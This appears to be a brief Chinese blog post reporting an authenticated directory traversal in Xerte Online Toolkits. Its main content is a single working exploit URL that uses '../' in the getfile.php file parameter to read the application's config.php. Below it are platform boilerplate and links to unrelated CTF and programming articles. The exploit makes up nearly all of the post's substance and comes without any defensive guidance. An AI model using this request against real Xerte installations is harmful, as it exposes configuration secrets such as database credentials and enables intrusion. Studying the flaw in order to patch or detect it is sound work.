Xerte 3.10.3 - Directory Traversal (Authenticated)

很简单的绕过。

http://127.0.0.1:8081/xerteonlinetoolkits-3.8.5-33/getfile.php?file=1-guest2-1/../config.php

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • hackme
    记hackeme做题 hide and seek 查看源代码,搜索flag,看到flag guestbook 简单...
    Aluvion阅读 8,603评论 0 2
  • Spring Cloud
    Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,314评论 19 139
  • 2018-01-15
    2017 LCTF 学习体会 1. web签到题: 用file协议可以读取本地文件 要绕过逻辑中对host的检查,...
    乱七八糟的心情阅读 1,631评论 0 0
  • I春秋刷题 WEB篇
    I春秋刷题 WEB篇 一、爆破-1 题目内容:flag就在某六位变量中。 <?phpinclude "flag...
    花满半山阅读 5,503评论 0 0
  • docker学习
    [if !supportLists]1. [endif]今日大纲 [if !supportLists]1、 [en...
    我也是醉了Ryan阅读 3,959评论 0 0